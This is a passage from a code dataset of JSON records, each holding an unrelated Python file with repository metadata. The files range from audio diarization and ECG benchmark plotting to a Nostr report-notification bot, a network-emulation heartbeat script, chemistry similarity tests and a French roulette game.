;\")\nprint(result)\n# -----------------\nprint(df_sin(math.pi / 3))\n# df_sin = Derivate(df_sin)\n# print(df_sin(math.pi / 3))\n","repo_name":"sa2209GitHub/python_oop","sub_path":"lesson_12.py","file_name":"lesson_12.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11558917869","text":"from output import json_output\n\n#Give this function a json response that has auto_chapters and speaker_labels set to true\n#see the output formatted in a way that makes it easy to embed & store each individual chapter in a vector DB\ndef speaker_diarized_output(json_response):\n # Check if auto_chapters and speaker_labels are true\n if not (json_response.get('auto_chapters') and json_response.get('speaker_labels')):\n return None\n\n chapters = json_response.get('chapters', [])\n utterances = json_response.get('utterances', [])\n\n diarized_output = []\n\n for chapter in chapters:\n chapter_start = chapter['start']\n chapter_end = chapter['end']\n\n # Filter utterances that fall within the chapter's start and end time\n relevant_utterances = [u for u in utterances if u['start'] >= chapter_start and u['end'] <= chapter_end]\n\n # Generate the speaker diarized output for each relevant utterance\n chapter_transcript = []\n for utterance in relevant_utterances:\n speaker = utterance['speaker']\n start_time = utterance['start']\n end_time = utterance['end']\n text = utterance['text']\n\n formatted_output = f\"Speaker {speaker} [{start_time/1000:.2f} - {end_time/1000:.2f}]: {text}\"\n chapter_transcript.append(formatted_output)\n\n diarized_output.append({\n 'chapter_summary': chapter['summary'],\n 'transcript': chapter_transcript\n })\n\n return diarized_output\n\ndiarized_response = speaker_diarized_output(json_output)\nfor chapter in diarized_response:\n print(f'{chapter[\"chapter_summary\"]} \\n')\n print(f'{chapter[\"transcript\"]} \\n\\n')\n","repo_name":"saflamini/ai-helpers","sub_path":"diarized_full_chapters.py","file_name":"diarized_full_chapters.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23788236217","text":"# © SleepECG developers\n#\n# License: BSD (3-clause)\n\n\"\"\"Plot results of runtime and detection quality benchmarks.\"\"\"\n\nimport sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\n\nif len(sys.argv) != 2:\n print(\"Usage: python plot_benchmark_results.py .csv\")\n exit()\n\nresults_filepath = Path(sys.argv[1])\nbenchmark, db_slug, *_ = results_filepath.stem.split(\"__\")\nplot_filepath = results_filepath.with_suffix(\".svg\")\nresults = pd.read_csv(results_filepath).sort_values(\"detector\")\n\nif benchmark == \"runtime\":\n fs = results[\"fs\"][0]\n results[\"signal_len\"] = results[\"num_samples\"] / (results[\"fs\"] * 3600)\n results = results.groupby([\"detector\", \"signal_len\"], as_index=False).agg(\n mean_runtime=(\"runtime\", \"mean\"),\n std_runtime=(\"runtime\", \"std\"),\n n=(\"runtime\", \"count\"),\n )\n results[\"error\"] = results[\"std_runtime\"] / np.sqrt(results[\"n\"])\n\n # order by runtime for longest signal, slowest algorithm first\n maxlen = results[\"signal_len\"].max()\n order = (\n results.query(f\"signal_len == {maxlen}\")\n .groupby(\"detector\")[\"mean_runtime\"]\n .mean()\n .apply(lambda x: 1 / x) # reverse order\n .to_dict()\n )\n results = results.sort_values(by=[\"detector\", 
\"signal_len\"], key=lambda x: x.map(order))\n\n # each detector should have the same color in each benchmark\n colors = [px.colors.qualitative.Plotly[i] for i in [0, 1, 7, 5, 8, 4, 2, 3, 9, 6]]\n\n fig = (\n px.line(\n results,\n x=\"signal_len\",\n y=\"mean_runtime\",\n markers=True,\n color=\"detector\",\n color_discrete_sequence=colors,\n log_y=True,\n labels={\n \"signal_len\": \"Signal length (hours)\",\n \"mean_runtime\": \"Mean runtime (s)\",\n },\n title=f\"Mean detector runtime for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_yaxes(rangemode=\"tozero\")\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelif benchmark == \"metrics\":\n results[\"precision\"] = results[\"TP\"] / (results[\"TP\"] + results[\"FP\"])\n results[\"recall\"] = results[\"TP\"] / (results[\"TP\"] + results[\"FN\"])\n results[\"f1\"] = 2 / (results[\"recall\"] ** -1 + results[\"precision\"] ** -1)\n fig = (\n px.box(\n results.melt(id_vars=[\"detector\"], value_vars=[\"precision\", \"recall\", \"f1\"]),\n color=\"detector\",\n y=\"value\",\n labels={\"value\": \"\"},\n facet_col=\"variable\",\n title=f\"Metrics for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_xaxes(range=[-0.4, 0.4])\n .update_yaxes(range=[-0.01, 1.01], tick0=0, dtick=0.1)\n .for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[1]))\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelif benchmark == \"rri_similarity\":\n fig = (\n px.box(\n results,\n y=\"pearsonr\",\n color=\"detector\",\n labels={\"pearsonr\": \"Correlation coefficient\"},\n title=f\"Correlation coefficient for RRI timeseries for {db_slug.upper()}\",\n width=1000,\n template=\"plotly_white\",\n )\n .update_yaxes(range=[-1.01, 1.01], tick0=-1, dtick=0.25)\n .update_layout(legend_title=\"\")\n )\n fig.write_image(plot_filepath)\n\nelse:\n raise ValueError(f\"No plotting strategy defined for {results_filepath}.\")\n","repo_name":"cbrnr/sleepecg","sub_path":"examples/benchmark/plot_benchmark_results.py","file_name":"plot_benchmark_results.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"72119825127","text":"\"\"\"\nTattleBot will listen for kind=1984 reports and notify the subject of the report that they've been tattled on.\n\nYou can subclass TattleBot and override handle_message(event, tattle_subject, message) to do something more interesting with the generated message\nOverride create_message(event, report_type, tattled_event_id, impersonation) to generate a different response\n\nTo run:\nTATTLE_WATCH= NOSTR_KEY= nostr-bot run -c nostr_bot.examples.reporting.TattleBot -r wss://my.relay.biz\n\n\"\"\"\n\nfrom nostr_bot.bot import CommunicatorBot\nfrom aionostr.util import to_nip19\nimport shelve\nimport os\nimport time\n\n\nclass TattleBot(CommunicatorBot):\n SEND_MESSAGE = False\n\n shelf = shelve.open('tattlebot')\n\n def get_query(self):\n query = {\n 'kinds': [1984]\n }\n last_seen = self.get_last_seen()\n if last_seen:\n query['since'] = last_seen\n pubkeys = self.get_watch_for_pubkeys()\n if pubkeys:\n query['#p'] = pubkeys\n return query\n\n def get_last_seen(self):\n return self.shelf.get('last_seen', 0)\n\n def set_last_seen(self, event):\n self.shelf['last_seen'] = max(event.created_at, self.get_last_seen())\n\n def get_watch_for_pubkeys(self):\n pubkeys = os.getenv('TATTLE_WATCH', '').split(',')\n if all(pubkeys):\n return 
pubkeys\n\n async def handle_event(self, event):\n if event.id in self.shelf:\n self.log.info(\"Skipping %s\", event.id)\n return\n report_type = ''\n tattled_event_id = ''\n tattle_subject = ''\n impersonation = ''\n for tag in event.tags:\n if tag[0] == 'report':\n report_type = tag[1]\n elif tag[0] == 'e':\n tattled_event_id = tag[1]\n elif tag[0] == 'p':\n if len(tag) == 3 and tag[2] == 'impersonation':\n impersonation = tag[1]\n else:\n tattle_subject = tag[1]\n\n message = self.create_message(event, report_type, tattled_event_id, impersonation)\n\n response = await self.handle_message(event, tattle_subject, message)\n self.set_last_seen(event)\n self.shelf[event.id] = {'seen': time.time(), 'response': response}\n\n def create_message(self, event, report_type, tattled_event_id, impersonation):\n reporter = to_nip19('npub', event.pubkey)\n if tattled_event_id:\n tattle_note = to_nip19('note', tattled_event_id)\n else:\n tattle_note = ''\n if report_type == 'spam':\n reason = 'spamming'\n elif report_type == 'illegal':\n reason = 'doing something illegal'\n elif report_type == 'impersonation':\n reason = f'impersonating {to_nip19(\"npub\", impersonation)}'\n else:\n reason = report_type\n response = f'''YOU'RE IN TROUBLE\n{reporter} tattled on you for {reason} in {tattle_note}.\nThey said you were \"{event.content}\"\n\nJust letting you know.\n\nSent by TattleBot.\n'''\n return response\n\n async def handle_message(self, event, tattle_subject, message):\n if tattle_subject and message:\n if self.SEND_MESSAGE:\n dm = self.make_dm(tattle_subject, content=message)\n self.log.debug(str(dm))\n await self.reply(dm)\n self.log.info(\"Alerted %s about tattling on %s with dm %s\", tattle_subject, event.id, dm.id)\n return dm.id\n else:\n self.log.info(\"%s tattled on %s. Sending:\\n%s\", event.pubkey, tattle_subject, message)\n","repo_name":"davestgermain/nostr_bot","sub_path":"nostr_bot/examples/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"35150320048","text":"class Animals:\n def __init__(self, name, noise, color):\n self.name = name;\n self.noise = noise;\n self.color = color;\n\n def describe(self):\n print('The {} is {} and makes the noise: {}'.format(self.name, self.color, self.noise));\n\n\ntiger = Animals('tiger', 'Rwaaarw', 'Orange and black');\ndolfin = Animals('dolfin', 'Reeeeeee', 'Grey');\n\ntiger.describe();\n\nclass House:\n def __init__(self, SqM, numberOfRooms, marketValue, backGarden):\n self.SqM = SqM;\n self.numberOfRooms = numberOfRooms;\n self.marketValue = marketValue;\n self.backGarden = backGarden;\n\nhouse_1024 = House(120, 4, 120000, True);\nhouse_3000 = House(300, 8, 1000000, True);\nhouse_1234 = House(80, 2, 78000, False);\n\nprint(house_1024.SqM);\nprint(house_3000.numberOfRooms);\nprint(house_1234.marketValue);\n","repo_name":"thomas367/learning","sub_path":"Languages/Python/13. 
Classes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4414864291","text":"import xml.etree.ElementTree as ET\nimport json\n\ndef get_attribute_value(item, key):\n    attribute = item.find(f\"attribute[@key='{key}']\")\n    if attribute is not None:\n        return attribute.get(\"value\")\n    return None\n\ndef parse_item(item):\n    item_data = {\n        \"clientId\": int(item.get(\"id\")) if item.get(\"id\") else 0,\n        \"itemName\": item.get(\"name\") or \"\",\n        \"attack\": get_attribute_value(item, \"attack\") or \"\",\n        \"armor\": get_attribute_value(item, \"armor\") or \"\",\n        \"defense\": get_attribute_value(item, \"defense\") or \"\",\n        \"extraDefense\": get_attribute_value(item, \"extradef\") or \"\",\n        \"shootRange\": get_attribute_value(item, \"range\") or \"\",\n        \"hitChance\": get_attribute_value(item, \"hitchance\") or \"\",\n        \"weight\": int(get_attribute_value(item, \"weight\")) if get_attribute_value(item, \"weight\") else 0,\n        \"desc\": get_attribute_value(item, \"description\") or \"\",\n        \"uid\": int(item.get(\"id\")) if item.get(\"id\") else 0,\n        \"itemType\": \"Common\",\n        \"stackable\": True,\n        \"action\": \"new\"\n    }\n    \n    name = item.get(\"name\")\n    if name:\n        if \"helmet\" in name.lower():\n            item_data[\"type\"] = \"Helmet\"\n        elif \"armor\" in name.lower():\n            item_data[\"type\"] = \"Armor\"\n        elif \"shield\" in name.lower():\n            item_data[\"type\"] = \"Shield\"\n        elif \"sword\" in name.lower():\n            item_data[\"type\"] = \"Sword\"\n        elif \"legs\" in name.lower():\n            item_data[\"type\"] = \"Legs\"\n        elif \"boots\" in name.lower():\n            item_data[\"type\"] = \"Boots\"\n        elif \"ring\" in name.lower():\n            item_data[\"type\"] = \"Ring\"\n        elif \"necklace\" in name.lower():\n            item_data[\"type\"] = \"Necklace\"\n\n    weapon_type = get_attribute_value(item, \"weaponType\")\n    if weapon_type:\n        item_data[\"type\"] = weapon_type.capitalize()\n    \n    return item_data\n\ndef parse_xml_file(file_path):\n    tree = ET.parse(file_path)\n    root = tree.getroot()\n\n    tooltips = []\n    for item in root.findall(\"item\"):\n        if get_attribute_value(item, \"weight\") is not None:\n            item_data = parse_item(item)\n            tooltips.append(item_data)\n\n    return tooltips\n\n\ndef generate_lua_table(tooltips):\n    lua_table = \"local tooltips = {\\n\"\n    for tooltip in tooltips:\n        lua_table += \"    {\\n\"\n        for key, value in tooltip.items():\n            lua_table += f\"        {key} = {repr(value)},\\n\"\n        lua_table += \"    },\\n\"\n    lua_table += \"}\\n\"\n    return lua_table\n\n\ndef main():\n    xml_file = \"items.xml\"\n    lua_file = \"tooltips.lua\"\n\n    tooltips = parse_xml_file(xml_file)\n    lua_table = generate_lua_table(tooltips)\n\n    with open(lua_file, \"w\") as file:\n        file.write(lua_table)\n\n    print(f\"Generated the Lua file: {lua_file}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Corlyone/canary-personal","sub_path":"data/items/parseitems.py","file_name":"parseitems.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14716652442","text":"from dnfpluginscore import logger\n\nimport os\nimport dnf\n\n\nclass Usrkeeper(dnf.Plugin):\n\n    name = 'usrkeeper'\n\n    def _out(self, msg):\n        logger.debug('Usrkeeper plugin: %s', msg)\n\n    def resolved(self):\n        self._out('pre transaction commit')\n        command = '%s %s' % ('usrkeeper', \" pre-install\")\n        ret = 
os.system(command)\n        if ret != 0:\n            raise dnf.exceptions.Error('usrkeeper returned %d' % (ret >> 8))\n\n    def transaction(self):\n        self._out('post transaction commit')\n        command = '%s %s > /dev/null' % ('usrkeeper', \"post-install\")\n        os.system(command)\n\nif __name__ == \"__main__\":\n    from distutils.core import setup\n    setup(name=\"dnf-usrkeeper\",\n          packages=[\"dnf-plugins\"],\n          package_dir={\"dnf-plugins\":\"usrkeeper-dnf\"})\n","repo_name":"strugee/usrkeeper","sub_path":"usrkeeper-dnf/usrkeeper.py","file_name":"usrkeeper.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18295110962","text":"import os\nimport sys\nfrom itertools import islice, product\n\nsys.path.append(\n    os.path.normpath(\n        os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\", \"common\")\n    )\n)\nfrom env_indigo import *  # noqa\n\nindigo = Indigo()\nindigo.setOption(\"ignore-stereochemistry-errors\", \"1\")\nindigo.setOption(\"ignore-noncritical-query-features\", \"true\")\nindigo.setOption(\"similarity-type\", \"CHEM\")\n\nprint(\"*** Difference between CHEM and Normalized-Edit ***\")\n\nsmiles_file_path = joinPathPy(\"molecules/pubchem_slice_100k.smiles\", __file__)\nnum_control_mols = 10\nnum_mols = 10000\n\n# the max accepted difference between `norm` and `chem`\nsimilarity_threshold = 0.20\nzero_similarity_threshold = 0.35\nalarm_similarity_threshold = 0.40\n\nall_mols = (m for m in indigo.iterateSmilesFile(smiles_file_path))\ncontrol_mols = islice(all_mols, num_control_mols)\nmols = islice(all_mols, num_mols)\n\ncheck_counter = 0\nproblems_counter = 0\nzero_problems_counter = 0\nalarm_problems_counter = 0\n\nworst_problem_difference = 0\nworst_problem_data = (None, None, 0.0, 0.0)\n\nfor m1, m2 in product(control_mols, mols):\n    f1 = m1.fingerprint(\"sim\")\n    f2 = m2.fingerprint(\"sim\")\n\n    norm = indigo.similarity(m1, m2, \"normalized-edit\")\n    chem = indigo.similarity(f1, f2, \"tversky 0.7 0.7\")\n    diff = abs(norm - chem)\n\n    check_counter += 1\n\n    if diff > similarity_threshold:\n        problems_counter += 1\n\n    if diff > zero_similarity_threshold:\n        zero_problems_counter += 1\n\n    if diff > alarm_similarity_threshold:\n        alarm_problems_counter += 1\n\n    if diff > worst_problem_difference:\n        worst_problem_difference = diff\n        worst_problem_data = (m1, m2, norm, chem)\n\n\nprint(\"  Molecule group size: %d\" % num_mols)\nprint(\"  Control group size: %d\" % num_control_mols)\nprint(\"  Number of pairs: %d\" % check_counter)\n\nDEBUG = False  # turn off for reproducible results\nif DEBUG:\n    print(\n        \"  Out of %d pairs %d pairs were above the similarity threshold %f, which is %d%%\"\n        % (\n            check_counter,\n            problems_counter,\n            similarity_threshold,\n            round(100.0 * problems_counter / check_counter),\n        )\n    )\n    print(\n        \"  Out of %d pairs %d pairs were above the zero similarity threshold %f, which is %d%%\"\n        % (\n            check_counter,\n            zero_problems_counter,\n            zero_similarity_threshold,\n            round(100.0 * zero_problems_counter / check_counter),\n        )\n    )\n    print(\n        \"  %d pairs were above the alarm similarity threshold %f, which is %d%%\"\n        % (\n            alarm_problems_counter,\n            alarm_similarity_threshold,\n            round(100.0 * alarm_problems_counter / check_counter),\n        )\n    )\n\nall_is_fine_flag = True\n\nif 1.0 * alarm_problems_counter / check_counter > 0.0001:\n    all_is_fine_flag = False\n    (m1, m2, norm, chem) = worst_problem_data\n    print(\"  ALARM!\\n\")\n    print(\n        \"    Too many pairs (%d) were above the alarm problem threshold %f\\n\"\n        
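# editor's note: this branch reports the worst offending pair; it fires when\n        # more than 0.01% of all pairs exceed alarm_similarity_threshold (0.40)\n        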
% (alarm_problems_counter, alarm_similarity_threshold)\n )\n print(\" mol1: %s\\n\" % (m1.canonicalSmiles()))\n print(\" mol2: %s\\n\" % (m2.canonicalSmiles()))\n print(\" normalized-edit sim: %f, chem sim: %f\\n\" % (norm, chem))\n print(\n \" The difference %f is bigger than the alarm threshold %f\\n\"\n % (worst_problem_difference, alarm_similarity_threshold)\n )\n\nif 1.0 * zero_problems_counter / check_counter > 0.001:\n all_is_fine_flag = False\n print(\" ALARM!\\n\")\n print(\n \" Too many pairs (%d) were above the zero problem threshold %f\\n\"\n % (zero_problems_counter, zero_similarity_threshold)\n )\n\nif 1.0 * problems_counter / check_counter > 0.25:\n all_is_fine_flag = False\n print(\" ALARM!\\n\")\n print(\n \" Too many pairs (%d) were above the problem threshold %f\\n\"\n % (problems_counter, similarity_threshold)\n )\n\nif all_is_fine_flag:\n print(\" All seems to be fine\")\n","repo_name":"epam/Indigo","sub_path":"api/tests/integration/tests/similarity/chem-vs-normalized-edit.py","file_name":"chem-vs-normalized-edit.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"35013654600","text":"from tkinter import *\n\ndef convert():\n kg = entry_kg.get()\n # 1 kg = 1000 gram\n label_result_gram[\"text\"] = f\"{round(float(kg)*1000, 4)}\"\n\n # 1 kg = 2.20462262 pound\n label_result_pounds[\"text\"] = f\"{round(float(kg)*2.20462262, 4)}\"\n\n # 1 kg = 35.2739619 ounce\n label_result_ounce[\"text\"] = f\"{round(float(kg)*35.2739619, 4)}\"\n\nif __name__ == '__main__':\n display = Tk()\n\n # create frame kg\n frame_kg = Frame(display)\n label_kg = Label(frame_kg, text = \"Enter the weight in Kg\")\n entry_kg = Entry(frame_kg, width = 20)\n\n label_kg.grid(row=0, column=0)\n entry_kg.grid(row=0, column=1)\n\n # Create button convert\n button_convert = Button(display, text = \"Convert\", command = convert)\n \n # Create frame gram\n frame_gram = Frame(display)\n label_gram = Label(frame_gram, text = \"Gram\")\n label_result_gram = Label(frame_gram, text = \"0\")\n \n label_gram.grid(row=0, column=0, sticky=\"E\")\n label_result_gram.grid(row=0, column=1, sticky=\"W\")\n \n # Create frame pounds\n frame_pounds = Frame(display)\n label_pounds = Label(frame_pounds, text = \"Pounds\")\n label_result_pounds = Label(frame_pounds, text = \"0\")\n \n label_pounds.grid(row=0, column=0, sticky=\"E\")\n label_result_pounds.grid(row=0, column=1, sticky=\"W\")\n \n # Create frame ounce\n frame_ounce = Frame(display)\n label_ounce = Label(frame_ounce, text = \"Ounce\")\n label_result_ounce = Label(frame_ounce, text = \"0\")\n \n label_ounce.grid(row=0, column=0, sticky=\"E\")\n label_result_ounce.grid(row=0, column=1, sticky=\"W\")\n\n # display\n frame_kg.grid(row=0, column=0, padx=10)\n button_convert.grid(row=0, column=1)\n frame_gram.grid(row=1, column=0)\n frame_pounds.grid(row=2, column=0)\n frame_ounce.grid(row=3, column=0)\n \n display.mainloop()","repo_name":"DuyNguyen555/Codegyms","sub_path":"python_basic/12.library_tkinter/weight_conversion.py","file_name":"weight_conversion.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26721657012","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeElements(self, head: Optional[ListNode], val: int) -> 
Optional[ListNode]:\n dummy = ListNode(-1, head)\n left = dummy\n while head:\n if head.val != val:\n left = head\n else:\n left.next = head.next\n head = head.next\n return dummy.next","repo_name":"Bigdreamer17/LeetCode","sub_path":"0203-remove-linked-list-elements/0203-remove-linked-list-elements.py","file_name":"0203-remove-linked-list-elements.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35450548301","text":"# -*- coding: utf-8 -*-\n# 心拍数、電圧を取得してBLEでアドバタイズ(ブロードキャスト)\n# M5StickCは4秒:アドバタイズ、1秒:Deep Sleep\n# ラズパイ側は常時スキャンし、データーを取得したらprintする\n\nfrom bluepy.btle import DefaultDelegate, Scanner, BTLEException\nimport sys\nimport struct\nfrom datetime import datetime\nimport subprocess\n\n# T_PERIOD = 4\n\n\nclass ScanDelegate(DefaultDelegate):\n def __init__(self): # コンストラクタ\n DefaultDelegate.__init__(self)\n self.lastseq = None\n self.lasttime = datetime.fromtimestamp(0)\n print(\"init\")\n\n def handleDiscovery(self, dev, isNewDev, isNewData):\n if isNewDev or isNewData: # 新しいデバイスまたは新しいデータ\n for (adtype, desc, value) in dev.getScanData(): # データの数だけデータスキャンを繰り返す\n # 'ffff' = テスト用companyID\n # M5stickCからのデータを見つけたら\n if desc == 'Manufacturer' and value[0:4] == 'ffff':\n __delta = datetime.now() - self.lasttime # 前回取得時刻からの差分をとる\n # アドバタイズする1秒(デフォルト:10秒)の間に複数回測定されseqが加算されたものは捨てる(最初に取得された1個のみを使用する)\n # default seconds = 11\n if value[4:6] != self.lastseq and __delta.total_seconds() > 5:\n self.lastseq = value[4:6] # Seqと時刻を保存 時刻はどこにあるんだ\n self.lasttime = datetime.now()\n # (temp, humid, press, volt) = struct.unpack(' 80:\n # ここに直接数値を埋め込めるか?予め文字列に入れるか?\n loss_netem = (bpm - 80) * 4\n if loss_netem > 70:\n loss_netem = 70\n # delay_netem = bpm - 75 # 遅延量(100bpmで100ms)\n # jitter_netem = int((bpm - 75) / 2) # 遅延量のゆらぎ(±)\n # changeなので指定した値に変更される。累積はされない\n # cmd_netem = \"sudo tc qdisc change dev eth0 root netem delay \" + \\\n # str(delay_netem) + \"ms\"\n # + \\\n # str(jitter_netem) + \"ms\"\n cmd_netem = \"sudo tc qdisc change dev eth0 root netem loss \" + \\\n str(loss_netem) + \"%\" + \" delay \" + str(loss_netem)\n # subprocess.runが動いている間はスキャンできないのでは?\n subprocess.run(\n cmd_netem, shell=True)\n print(\"loss: \" + str(loss_netem) + \"%\")\n else:\n # subprocess.run(\n # ['sudo tc qdisc change dev eth0 root netem delay 0ms'], shell=True)\n subprocess.run(\n ['sudo tc qdisc change dev eth0 root netem loss 0%'], shell=True)\n\n\n# if __name__ == \"__main__\":\n\n# 有線'eth0'から出ていく��ケットにネットワークエミュレーションを追加\n# そもそもこのプログラム自体sudoで動かしているので処理中にsudo passを求められることはないはず\n# tc = traffic control\nsubprocess.run([\"sudo tc qdisc add dev eth0 root netem\"], shell=True)\n\nscanner = Scanner().withDelegate(ScanDelegate())\ntry:\n while True:\n # try:\n # スキャンする。デバイスを見つけた後の処理はScanDelegateに任せる\n print(\"scan\")\n scanner.scan(5.0) # 5秒間スキャンする(この間他の処理は止まる)\n# except BTLEException:\n # ex, ms, tb = sys.exc_info()\n # print('BLE exception '+str(type(ms)) +\n # ' at ' + sys._getframe().f_code.co_name)\n # subprocess.run([\"sudo tc qdisc del dev eth0 root\"], shell=True)\nexcept KeyboardInterrupt as e:\n # ネットワークエミュレータの削除\n # ここで遅延を元に戻してから終了する\n # subprocess.run([\"sudo tc qdisc del dev eth0 root\"], shell=True)\n print(\"Aborted!\")\n # pass\nfinally:\n subprocess.run([\"sudo tc qdisc del dev eth0 root\"], 
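# editor's note: running the cleanup here in the finally block guarantees the\n        # netem qdisc is removed even when the loop exits via KeyboardInterrupt\n        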
shell=True)\n","repo_name":"p3ishnm2/HeartBeat_Packet","sub_path":"Access_Point/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14998658592","text":"from typing import List\n\nfrom numpy import sort\n\n\nclass ev_2021_06_24_no_149:\n def maxPoints(self, points: List[List[int]]) -> int:\n allPointSize = len(points)\n PointMaxNumberContainer = [0]*allPointSize\n for i in range(0, allPointSize -1):\n pointKNumberContainer = [0]*(allPointSize -1)\n pointA = points[i]\n skip = False\n for j in range(0, allPointSize - 1):\n if(j == i):\n skip = True\n continue\n pointB = points[j]\n if(pointB[0] == pointA[0]):\n k = True\n else:\n k = (pointB[1] - pointA[1])/(pointB[0] - pointA[0])\n if(skip):\n pointKNumberContainer[j-1] = k\n else:\n pointKNumberContainer[j] =k\n sort(pointKNumberContainer)\n\n\n\n\n return 1\n\n\n\n\n\n\nif __name__ == \"__main__\":\n input = [[1, 1], [2, 2], [3, 3]]\n a = ev_2021_06_24_no_149()\n t = [1, True, 3]\n print(t)\n print(a.maxPoints(input))\n print((3-1)/(4-1))\n","repo_name":"mikilangkilo/leetcode","sub_path":"src/everyday/ev_2021_06_24_no_149.py","file_name":"ev_2021_06_24_no_149.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983169987","text":"# 정수 N이 입력되면 00시 00분 00초부터 N시 59분 59초까지의 모든 시각 중에서 3이 하나라도 포함되는 \n# 모든 경우의 수를 구하는 프로그램을 작성하시오.\n# 예를 들어 1을 입력했을 때 다음은 3이 하나라도 포함되어 있으므로 세어야하는 시각입니다.\n# 00시 00분 03초, 00시 13분 30초\n# 반면에 다음은 3이 하나도 포함되어 있지 않으므로 세면 안되는 시각입니다.\n# 00시 02분 55초, 01시 27분 45초\n\n# 00~23시 00~59분 00~59초 까지 존재한다.\n\ntarget_hour = int(input())\n\ncount = 0\n\nfor hour in range(target_hour+1):\n for minute in range(60):\n for second in range(60):\n if \"3\" in str(hour) or \"3\" in str(minute) or \"3\" in str(second):\n count += 1\n\nprint(count)","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/implementation/implementation-01.py","file_name":"implementation-01.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9989415913","text":"## TP-1 Zcasino ##\n### Le joueur mise un numéro entre 0 et 49 ###\n#### Il dépose la mise souhaitée ####\n##### Les numéros pairs sont noirs, les impairs rouges #####\n###### Le croupier fait tourner la roulette et la bille s'arrête sur ######\n###### le numéro gagnant. ######\n####### Si le numéro est le même que celui du joueur alors : #######\n# Le joueur remporte sa mise + 3 fois sa mise #\n## Si la couleur est la même alors : ## \n### Le joueur remporte sa mise + 50% de sa mise. ###\n#### Si le numéro et la couleur diffèrent alors : ####\n##### Le joueur perd sa mise. 
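#####\n# Editor's note (English summary of the French header above): the player picks\n# a number from 0 to 49 and a stake; even numbers are black, odd numbers red.\n# An exact match adds 3x the stake, a colour match adds 50% of the stake,\n# otherwise the stake is lost.\n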
#####\nimport random\n\ncash = 1000\nprint (\"Votre montant de départ est de\", cash, '$')\n \ncontinuer_partie = True\nwhile continuer_partie:\n# Le joueur choisi le numéro sur lequel il effectuera une mise #\n \n numero = input('Choisissez un numéro situé entre 0 et 49:')\n while int(numero) <= 0 or int(numero) >= 50:\n numero = input('Choisissez un numéro situé entre 0 et 49:')\n if int(numero) % 2 == 0:\n print ('Vous misez sur le', numero, 'noir')\n else:\n print ('Vous misez sur le', numero, 'rouge')\n \n # Le joueur détermine maintenant sa mise #\n \n mise_joueur = input ('Quelle sommes souhaitez-vous miser ?')\n while int(mise_joueur) > int(cash):\n print('Fond non disponible')\n mise_joueur = input('Quelle sommes souhaitez-vous miser ?')\n else :\n print('mise de', mise_joueur, '$')\n \n# Les jeux sont faits, rien ne va plus #\n \n print('Les jeux sont faits, rien ne va plus!')\n \n# Le croupier fait tourner la roulette et le résultat est annoncé #\n \n num_gagnant = random.randint(1,49)\n if num_gagnant % 2 == 0:\n print('Le numéro gagnant est', num_gagnant, 'noir')\n else:\n print('Le numéro gagnant est', num_gagnant, 'rouge')\n \n# Le croupier compare maintenant le numéro gagnant avec celui du joueur #\n \n# Les numéros sont identiques #\n \n if int(numero) == int(num_gagnant):\n cash = cash + (3 * int(mise_joueur))\n print('Bravo! Vous remportez 3 fois votre mise')\n print ('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont de couleurs noirs #\n \n elif int(numero) % 2 == 0 and int(num_gagnant) % 2 == 0:\n cash = int(cash) + (0.5 * int(mise_joueur))\n print('Pas mal! Vous remportez 50% de votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont de couleurs rouges #\n \n elif int(numero) % 2 != 0 and int(num_gagnant) % 2 != 0:\n cash = int(cash) + (0.5 * int(mise_joueur))\n print('Pas mal! Vous remportez 50% de votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont tout à fait différents #\n \n else:\n cash = int(cash) - int(mise_joueur)\n print('Vous venez de perdre votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Le joueur n'a plus d'argent #\n \n if cash <= 0:\n print( 'Vous voilà sans un sous, prière de quitter la table SVP')\n continuer_partie = False\n \n# Le joueur désire-t-il continuer la partie #\n \n quitter = 